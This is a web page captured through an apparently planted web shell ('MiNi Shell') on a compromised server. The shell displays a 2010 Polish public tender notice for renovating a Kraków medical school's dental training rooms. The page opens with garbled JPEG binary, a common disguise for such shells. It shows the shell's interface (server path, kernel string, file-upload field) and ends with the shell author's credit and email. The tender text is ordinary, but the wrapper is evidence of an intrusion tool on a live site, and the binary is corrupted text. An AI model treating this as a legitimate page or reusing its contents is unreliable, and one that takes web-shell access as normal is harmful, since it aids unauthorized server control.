JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100315/72436-N-2010.html

<p class="kh_header"><b>Kraków: Modernizacja bazy dydaktycznej - dostosowanie do kształcenia w zawodach technik dentystyczny i higienistka stomatologiczna dla Krakowskiej Medycznej Szkoły Policealnej im. Stanisławy Leszczyńskiej Nr 1 ul. Zamojskiego 58 w Krakowie.</b><br>
<b>Numer ogłoszenia: 72436 - 2010; data zamieszczenia: 15.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Krakowska Medyczna Szkoła Policealna im. Stanisławy Leszczyńskiej Nr 1 , ul. Zamojskiego 58, 30-523 Kraków, woj. małopolskie, tel. 0-12 656 05 08, faks 0-12 656 48 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ksm.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Krakowska Medyczna Szkoła Policealna im. Stanisławy Leszczyńskiej Nr 1.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja bazy dydaktycznej - dostosowanie do kształcenia w zawodach technik dentystyczny i higienistka stomatologiczna dla Krakowskiej Medycznej Szkoły Policealnej im. Stanisławy Leszczyńskiej Nr 1 ul. Zamojskiego 58 w Krakowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia w szczególności jest : 
    - Roboty budowlane-  demontaż krat wewnętrznych, drabinek ,tablic do koszykówki, rozbiórka  elementów
      stropów drewnianych ok.8m2,  wykonanie wydzieleń pożarowych poprzez montaż ścianek drzwiami
      aluminiowymi ok. 52m2,stolarki drzwiowej drewnianej profilowanej przeciwpożarowej( na wzór istniejącej ) EI30 
      ok. 12m2, konserwacja istniejących drzwi zabytkowych, założenie uszczelek dymoszczelnych w istniejących 
      drzwiach drewnianych po konserwacji, wykonanie robót budowlanych przy wydzieleniach pożarowych takich jak 
      odbicie tynków pasami ok.61m, wykonanie tynków ok. 256m, wykonanie ścianek działowych
      przeciwpożarowych z płyt Promatect-h  lub równoważy system p- poż. ok.27m2,: rozebranie ścianek działowych
      z cegły ok.12m2; wykucie z muru kratek wentylacyjnych 21szt, osadzenie nowych 11szt.;wykonanie ścianek 
      działowych GR z płyt na rusztach metalowych ok.107m2; wykonanie okładzin pojedynczych z płyt GK na
      ruszcie metalowym na stropach ok. 277m2;, wykonanie i montaż okien drewnianych  ze szkłem
      antywłamaniowym 1,08m2, dostawa świetlika wraz z konstrukcją z profili aluminiowych szkolonych szybą 
      antywłamaniową P4 i bezpieczną od dołu ok.10m2; posadzki: rozebranie posadzek z kamieni sztucznych ok. 
      21m2,lastryka ok. 106m2, rozebranie podłóg drewnianych ok.92m2, legarów ok.309m2,, wykonanie izolacji z 
      papy  i  izolacji  przeciwdźwiękowej z płyt styropianowychok.112m2, wykonanie izolacji folii PE na sucho
      ok.112m2, wykonanie posadzki cementowej ok.122m2, gruntowanie podłoży ok.416m2,  wykonanie warstw
      wyrównujących ok.346m2, ułożenie płytek ceramicznych na posadzce ok.134m2,, ułożenie cokołów z płytek
      ceramicznychok.97m2,ułożenie wykładziny z pcw zgrzewanej ok.232m2, wymiana cokołów ok.204m; Tynki:
      odbicie tynków na ścianach ok.180m2, wykonanie tynków i pasów tynków 324m2, przecieranie tynków
      ok.558m2, gruntowanie podłoży ok.155m2, licowanie ścian płytkami ceramicznymi ok.155m2, ługowanie farby
      olejnej ok.650m2,wyprawa cienkowarstwowa z akrylowych tynków dekoracyjnych ok.510m2;roboty malarskie:
      zmycie starej farby 1645m2,, malowanie z poszpachlowaniem nierówności ok.2451m2, malowanie farbami
      akrylowymi ok.3061m2,malowanie farbami olejnymi ścian ok.157m2,rur ok.220m, grzejników ok.17m2,
      zabezpieczenie podłóg folią ok.952m2, wykonanie mebli na zamówienie do wbudowania w pomieszczeniach 
      nr 03, nr 04, nr 05,nr 07 w ilości 17szt,  wywóz gruzu wraz z opłatą za składowanie ok.35m2, wywóz gruntu kat.
      III ok.7m2.
  - Remont sanitariatów- rozebranie ścianek działowych ok.48m2, wymiana stolarki drzwiowej 7szt,rozebranie
    posadzek z kamieni sztucznych wraz z skuciem warstw posadzki ok.65m2, wykonanie izolacji , warstw  
    posadzkowych, ułożenie  płytek ceramicznych na posadzce ok.65m2, skucie fliz ze ścian ok.53m2, odbicie 
    tynków ok.131m2, wykonanie tynków ok.166m2, roboty malarskie ok.245m2, demontaż i montaż kabin
    systemowych z odzysku ok.21m2, nowych ok.38m2, demontaż umywalek, misek ustępowych, rurociągów 
    kanalizacyjnych, instalacji wodnej, wykonanie nowej instalacji wodnej i kanalizacji, dostawa i montaż  misek
    ustępowych systemowych podwieszanych 11kpl, umywalek  15szt, zakup i montaż pojemników na ręczniki,
    dozowników na mydło, pojemników na papier toaletowy, suszarek, wykonanie instalacji elektrycznej wraz z 
    osprzętem, zakup i montaż urządzeń do podgrzewania wody 4szt,
    - Wykonanie instalacji elektrycznej- demontaż przewodów wtynkowych 1150m; demontaż puszek 90szt;
       demontaż gniazd 40szt; demontaż opraw 50szt; dostawa i montaż tablic szt. 5szt + modernizacja 1szt.;wykucie
       bruzd 327m; ułożenie rur winidurowych 327m;ułożenie przewodów ok1755m; zaprawianie bruzd, montaż 
       osprzętu-puszek gniazd, montaż opraw oświetleniowych ok103szt.,wykonanie pomiarów ;
    - Zakup i montaż klap oddymiających  2szt  wraz z instalacja oddymiania;
    - Wykonanie instalacji gazowej ok. 161m;,wykonanie prób szczelności, 
    - Wykonanie instalacji sprężonego powietrza- wykonanie fundamentu pod kompresory 2szt, demontaż 1szt,  
       montaż kompresorów 2szt ( w tym jeden nowy), wykonanie rurociągów miedzianych ok. 126m, wykonanie
       próby. 
    - Wykonanie instalacji c.o. demontaż 3szt grzejników, rurociągu stalowego ok. 20m, montaż nowej instalacji wraz 
       z grzejnikami, wykonanie próby szczelności instalacji;
    - Wykonanie instalacji wod-kan- demontaż bojlera, umywalki 3szt, brodzika z kabina 2szt, demontaż rurociągu
       żeliwnego 3,8m rurociągu kanalizacyjnego 8m, wykonanie rurociągu z PCV na ścianach ok. 12,9m, 
       wykonanie rurociągu z PCV w posadzce ok. 54m, montaż umywalek 5szt, zlewozmywaków 8szt wraz z  
       bateriami stojącymi, montaż pogrzewacza elektrycznego, wykonanie warstw posadzkowych przy robotach
       kanalizacyjnych, próby szczelności.
  - Wykonanie wentylacji mechanicznej- wykonanie przewodów wewnątrz budynku i na zewnątrz ze stali
    nierdzewnej, uzbrojenie przewodów, montaż centrali wentylacyjnej Mistral 1100P Pro-Vent , nagrzewnicy,
    i wentylatorów 2szt, wykonanie izolacji z wełny mineralnej, wykonanie pomiarów;
wg. przedmiaru robót stanowiącego załącznik od Nr 8 do Nr 16 do SIWZ i projekty zał. nr 17- 19 (projekt budowlany Pt. ,,Remont i modernizacja bazy dydaktycznej polegającej na adaptacji pomieszczeń na parterze na pracownie dentystyczne i protetyczne,, zał. nr 17 i wykonawczy zał. nr 18 - z tego projektu do przedmiotu zamówienia nie ujęto zakresu prac tj. -wyposażenia w meble w pomieszczeniach nr 01,nr 02a-02d, nr 08 :projekt budowlany Pt. ,,Remont i modernizacja bazy dydaktycznej ,,zał. nr 19- z tego projektu do przedmiotu zamówienia ujęto zakres prac dotyczący remontu sanitariatów) oraz Specyfikacji technicznej wykonania  i odbioru robót zał.Nr 7..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-0, 45.31.00.00-3, 45.33.12.10-1, 45.31.12.10-8, 45.33.11.00-7, 45.33.12.20-4, 45.33.30.00-0, 45.42.10.00-4, 45.43.00.00-0, 45.44.21.00-8, 45.33.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga  złożenia  wadium  w  wysokości 20 000,00 zł, (słownie; dziesięć tysięcy złotych).  Wadium może  być  wniesione  zgodnie z art.45 ust.6  ustawy  PZP  tj;  
1)	w  pieniądzu,  
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że  poręczenie kasy jest zawsze poręczeniem pieniężnym,  
3)	gwarancjach bankowych, 
4)	 gwarancjach ubezpieczeniowych, 
5)	 poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2 ustawy z  dnia 9 listopada
      2000r.o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. Nr 109, poz.1158, z późn. zm.). 
      Jeżeli wadium wnoszone będzie w formie  gwarancji bankowej/ ubezpieczeniowej to w treści gwarancji winny
      znaleźć się następujące elementy: 
      a)  zobowiązanie banku / towarzystwa ubezpieczeniowego do zapłaty sumy wadium w przypadku gdy zajdą
      ku temu ustawowe okoliczności, określone w przepisie art. 46 ustawy PZP, 
      b)  dokładną nazwę postępowania stanowiącego przyczynę wystawienia gwarancji, 
      c)  wskazanie sumy gwarancyjnej, 
      d)  wskazanie Zamawiającego, czyli beneficjenta gwarancji/ ubezpieczonego, (tj. Krakowska Medyczna Szkoła
      Policealna im. Stanisławy Leszczyńskiej Nr 1 - Główna Księgowa
      e)  wskazanie Wykonawcy, czyli zleceniodawcy gwarancji / ubezpieczyciela 
      f)  określenie  okresu  ważności  gwarancji  tj.  wskazanie  terminu,  w  którym  zobowiązanie  powstaje
         oraz wygasa, przy czym gwarancja o charakterze terminowym nie może zostać odwołana. 
Wadium  wnoszone  w  pieniądzu  należy  wpłacić  przelewem  na  rachunek  bankowy  Zamawiającego: 
08 1500 1487 1214 8007 2812 0000. 
Kserokopie dowodu wpłaty (dokonania  przelewu) należy dołączyć do oferty. 
Wadia (oryginały) w formach niepieniężnych  należy  zdeponować  u  Zamawiającego  ( Główna Księgowa -Elżbieta Chojnacka  oraz Małgorzata Biernat ul. Zamojskiego 58 II piętro, w dni robocze od godz. 1000 do 1300). 
Do oferty należy dołączyć  dowód  wniesienia wadium (kserokopie - poświadczoną za zgodność z oryginałem). 
W  przypadku  wadium  wniesionego w formie gwarancji, z treści tej gwarancji winno wynikać bezwarunkowo, że  na  każde  pisemne  żądanie  zgłoszone  przez  Zamawiającego,  w  terminie  związania ofertą,  gwarant  zobowiązuje  się  do  wypłaty  Zamawiającemu pełnej kwoty wadium w okolicznościach określonych art. 46 ust. 5 ustawy PZP.  
Wadium należy wnieść do dnia 30.03.2010r. do godz. 1000.
Za  zachowanie  terminu  do  wniesienia  wadium  w  przypadku  przelewu  lub  przekazu  uważa  się  uznanie 
rachunku bankowego Zamawiającego do dnia 30.03.2010 r. do godz.10.00. 
Zwrot  oraz  zatrzymanie  wadium  następuje  na  zasadach  określonych  w  art.  46  ustawy  Prawo  zamówień
publicznych.  Wadium  musi  być  zabezpieczone  na  okres  30  dni,  licząc  od  daty  składania  ofert  -  termin 
związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie do wykonania zamówienia:
           -warunek ten zostanie spełniony ,jeśli Wykonawca wykaże ,że w ciągu ostatnich 3 lat przed upływem
             terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie , wykonał 
             lub wykonuje co najmniej 2 roboty budowlane polegające na modernizacji lub remoncie budynku o
             podobnym do budynku stanowiącym przedmiot zamówienia o charakterze użytkowym, każda o wartości 
             nie mniejszej niż 500 000zł brutto. Przez podobny charakter użytkowy Zamawiający rozumie budynek z
             przeznaczeniem na pobyt ludzi lub do użytku publicznego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony ,jeśli Wykonawca wykaże, iż dysponuje lub będzie dysponował do 
             realizacji przedmiotowego zamówienia osobami zdolnymi do wykonania zamówienia posiadającym
             kwalifikacje zawodowe konieczne do realizacji zamówienia w rozumieniu ustawy z dnia 15 grudnia 2000r.
             o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001r. Nr 5,
             poz.42 ze zmianami)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.dysponuje lub będzie dysponował do realizacji przedmiotowego zamówienia osobą posiadającą 
                uprawnienia do kierowania robotami budowlanymi w specjalności  konstrukcyjno- budowlanej i 
                zaświadczenia od Wojewódzkiego Konserwatora Zabytków lub potwierdzenia posiadaniu kwalifikacji
                do kierowania i nadzorowania robót  w obiektach zabytkowych lub potwierdzenia przez Inwestorów
                wykonywania tych czynności  dla kierownika budowy. - która  będzie pełniła obowiązki kierownika 
                budowy.
 2. dysponuje lub będzie dysponował do realizacji przedmiotowego zamówienia osobą posiadającą 
                uprawnienia do kierowania robotami budowlanymi w specjalności instalacji sanitarnych, 
      3. dysponuje lub będzie dysponował do realizacji przedmiotowego zamówienia osobą posiadającą 
                uprawnienia do kierowania robotami budowlanymi w specjalności  instalacji elektrycznych, 
      4. Kierownik budowy, kierownik robót sanitarnych, kierownik robót elektrycznych muszą przynależeć do
                właściwej Izby Samorządu Zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony ,jeśli Wykonawca wykaże, iż posiada środki finansowe lub zdolność 
             kredytową w wysokości  nie mniejszej niż 400 000zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ksm.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Krakowska Medyczna Szkoła Policealna im. St. Leszczyńskiej Nr 1 , Kraków, ul. Zamojskiego 58 - sekretariat II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2010 godzina 10:00, miejsce: Krakowska Medyczna Szkoła Policealna im. St. Leszczyńskiej Nr 1 , Kraków, ul. Zamojskiego 58 - sekretariat II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com